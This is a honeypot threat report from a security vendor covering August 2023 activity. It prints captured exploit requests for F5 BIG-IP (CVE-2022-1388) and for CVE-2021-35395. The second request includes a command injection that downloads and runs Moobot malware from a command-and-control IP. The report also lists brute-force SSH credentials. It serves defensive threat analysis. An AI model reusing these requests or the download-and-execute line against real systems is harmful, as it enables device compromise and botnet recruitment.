Our selection of alerts on honeypots: report 15 – August 2023

A good understanding of active threats is necessary to achieve a good security posture. The following report provides actual trends that emerge from the Internet Background Noise based on the monitoring of two weeks of our Honeypots logs.

Check out our previous report here.

Exploit attempts of CVE about F5 BIG-IP iControl

Only on the 22^nd of July, the US IP address 198.23.251[.]118 hosted by AS 36352 (AS-COLOCROSSING) and known from public databases identifiying malicious IP addresses, has targeted one of our German honeypots on port TCP/80.

Our worldwide honeypot network has already captured this US IP address before. It tried to exploit two different vulnerabilities related to F5 BIG-IP iControl.

• CVE-2022-1388 (CVSSv3: 9.8)

This vulnerability allows iControl REST authentication bypasses on several BIG-IP versions. The IP address tried 3 times to exploit it on our honeypot.

Packets captured:

POST /mgmt/tm/util/bash HTTP/1.1 Host: x.xxx.x.xx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Content-Length: 81 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token Content-Type: application/json X-F5-Auth-Token: a Accept-Encoding: gzip Connection: close { "command": "run", "utilCmdArgs": "-c 'echo CVE-2022-1388 | rev'" }

This command line is an attempt to exploit the vulnerability. The pre-requisites of this exploitation are the following (in bold in the previous mentioned request):

• The Connection header must include X-F5-Auth-Token
• X-F5_Auth-Token header must be present
• Auth header must be set with the admin username and any password (we see in the aforementioned request : “Authorization: Basic YWRtaW46” which contains the Base64 encoded ”admin” string in order to pass following credentials user:admin and empty password.

Contrary to public POC publication and informations, it seems here that the pre-requisite “Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host” is not used, which may indicate that the vulnerability can be exploited without it.

In this case, the command executed remotely on the vulnerable server is :

“'echo CVE-2022-1388 | rev'”

And if the server’s really concerned it will send back the string “CVE-2022-1388” in reverse order (i.e. “8831-2202-EVC”).

• CVE-2021-22986 (CVSSv3: 9.8)

This one relates to the iControl REST interface which allows an unauthenticated remote command execution on several BIG-IP and BIG-IQ versions. The IP address performed two attempts of exploitation.

These two CVEs are very similar as our honeypot recorded the same type of packets. Our assessment is the following, it might be possible that the exact same vulnerability was inadvertently implemented in an upgraded version of the software. In their advisories, CheckPoint deals with the two of them as one.

The good practice is always to apply patch and update software whenever possible. Also, the iControl REST API access can be disabled by blocking access to TCP port 443 on the self-IP addresses through the port lockdown configuration.

However, it is the perfect example illustrating why it is not enough and that your organization deserves cybersecurity solutions tracking malicious behaviors during every step of the kill chain.

CVE-2021-35395 exploit attempts

On the 12^th of July, the Swiss IP address 141.255.164[.]98, hosted by AS 51852 (Private Layer INC) and known from public databases identifying malicious IP addresses, has targeted one of our Polish honeypots on port TCP/80.

This IP address tried to exploit CVE-2021-35395 (CVSSv3: 9.8) which targets the HTTP Webserver (included for management purposes) that is vulnerable to several buffer overflow vulnerabilities.

Packets captured on the targeted honeypot:

POST /goform/formSysCmd HTTP/1.1 Host: x.xx.x.xxx:80 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 166 sysCmd=cd /tmp || cd /mnt || cd /root || cd /; curl -O http://199.195.251[.]104//x86_64; chmod 777 x86_64; ./x86_64 blacksnow &&apply=Apply&submit-url=/syscmd.asp&msg=

This command line performs the downloading of a binary code from a C2 IP address (199.195.251[.]104 – known from public databases identifying malicious IP addresses) and then executes it. According to VirusTotal, the binary code downloaded “x86_64” is known for being Moobot, a Mirai variant, that turns affected systems into remote controlled bots.

This Swiss IP address has already been captured by our worldwide honeypot network for other malicious activities, at least since the 4^th of July 2023.

European honeypots: SSH connection attempts with credentials

Lithuania registered the most connection attempts (9.8%), Ireland ranks second (9.28%) and Czech Republic third (8.07%).

The most common credentials (login / password) that were used for authentication were:

• 345gs5662d34 / 345gs5662d34
• admin / admin
• ubnt / ubnt
• 0 / 0
• root / password

Top 10 most exploited CVE – July 2023

Most used usernames over SMB protocol

---